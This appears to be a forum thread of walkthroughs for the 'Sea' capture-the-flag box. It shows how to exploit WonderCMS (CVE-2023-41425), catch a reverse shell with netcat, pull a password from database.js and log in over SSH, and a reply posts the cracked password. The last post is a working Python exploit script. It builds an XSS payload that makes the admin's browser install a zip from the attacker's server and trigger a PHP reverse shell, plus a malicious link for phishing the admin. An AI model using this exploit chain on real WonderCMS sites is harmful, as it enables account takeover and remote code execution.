[androidhacker1337]

Hi Initial foothold and userflag

Add the IP to /etc/hosts file 

sudo nano /etc/hosts

IP     sea.htb

save it  Done 

----------------------------
http://sea.htb/themes/bike/README.md
You will get cms name wonderCMS
---------------------------
Exploit : 
https://github.com/prodigiousMind/CVE-2023-41425
Your shell is uploaded !!
-------------------------------------------
Now access the shell before that in another terminal just open nc -lnvp 4444
http://sea.htb/themes/revshell-main/rev....lport=4444
run above command by replacing the IP. 
--------------------------------------------
You got the shell 
Now cat /var/www/sea/data/database.js

You will see a pass and remove all the "\" form pass to carck with hashcat. But your in my blog so you dont have to do it  .

pass is 

Hidden Content

You must register or login to view this content.

Just 1 coin i need sorry but next post will be free 100%.

Now ssh with the user and pass 

User is amay

ssh amay@sea.htb and hit enter put the pass you get the user flag!!  .

For root please comment "No more credit" 7 comment and i will post the sol'n

Thanks 

See you soon !!

[108111118101]

Thanks for tips! Keep up the good work

[androidhacker1337]

Thanks brother

[1337_crypt]

Hi Initial foothold and userflag

Add the IP to /etc/hosts file 

sudo nano /etc/hosts

IP     sea.htb

save it  Done 

----------------------------
http://sea.htb/themes/bike/README.md
You will get cms name wonderCMS
---------------------------
Exploit : 
https://github.com/prodigiousMind/CVE-2023-41425
Your shell is uploaded !!
-------------------------------------------
Now access the shell before that in another terminal just open nc -lnvp 4444
http://sea.htb/themes/revshell-main/rev....lport=4444
run above command by replacing the IP. 
--------------------------------------------
You got the shell 
Now cat /var/www/sea/data/database.js

You will see a pass and remove all the "\" form pass to carck with hashcat. But your in my blog so you dont have to do it  .

pass is  Just 1 coin i need sorry but next post will be free 100%.

Now ssh with the user and pass 

User is amay

ssh amay@sea.htb and hit enter put the pass you get the user flag!!  .

For root please comment "No more credit" 7 comment and i will post the sol'n

Thanks 

See you soon !!

No more credit and thanks for tips! Keep up the good work

[bananoname]

login with amay and its password mychemicalromance

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Replying With Hidden Content

[androidhacker1337]

The password is in above thread ? kindly put some rep or credit i need it thanks.

[BanMeAgainPussies]

Thanks for this a lot

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

[androidhacker1337]

[Update] for this box here : Old public exploit is shit and not working use below script make it work also make a zip file rev.zip with rev.php add you shell code in rev.php

you can use any shell name it as rev.php and zip it rev.zip

then you can see that in http://sea.htb/themes/rev.php

# Exploit: WonderCMS XSS to RCE
import sys
import requests
import os

def generate_xss_script(ip, port):
return f'''
// the server has some issue resolving domain name with JavaScript
// we can just provide the target URL as required parameter
var whateverURL = "http://sea.htb";
var token = document.querySelectorAll('[name="token"]')[0].value;
// modify the ZIP file path serving on HTTP server
var urlRev = whateverURL+"/?installModule=http://{ip}:8000/rev.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {{
if (xhr3.status == 200) {{
var xhr4 = new XMLHttpRequest();
xhr4.withCredentials = true;
// visit rev.php inside the uploaded ZIP file
xhr4.open("GET", whateverURL+"/themes/rev/rev.php");
xhr4.send();
xhr4.onload = function() {{
if (xhr4.status == 200) {{
var ip = "{ip}";
var port = "{port}";
var xhr5 = new XMLHttpRequest();
xhr5.withCredentials = true;
// trigger reverse shell script and provide listener ip & port
xhr5.open("GET", whateverURL+"/themes/rev/rev.php?lhost=" + ip + "&lport=" + port);
xhr5.send();
}}
}};
}}
}};
'''

if __name__ == "__main__":
if len(sys.argv) < 4:
print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
sys.exit(1)

login_url = sys.argv[1]
ip_address = sys.argv[2]
port = sys.argv[3]

xss_script = generate_xss_script(ip_address, port)

try:
with open("xss.js", "w") as file:
file.write(xss_script)
print("[+] xss.js is created")
print("[+] Execute the following command in another terminal:\n\n----------------------------")
print(f"nc -lvp {port}")
print("----------------------------\n")

# Prepare the XSS link with appropriate replacements and URL encoding
xss_link = f'{login_url.replace("loginURL", "index.php?page=loginURL?")}\"></form><script src=\"http://{ip_address}:8000/xss.js\"></script><form action=\"'
print(f"Send the following link to the admin:\n\n----------------------------\n{xss_link}")
print("----------------------------\n")
print("\nStarting HTTP server to allow access to xss.js")
os.system("python3 -m http.server")
except Exception as e:
print(f"Error occurred: {e}")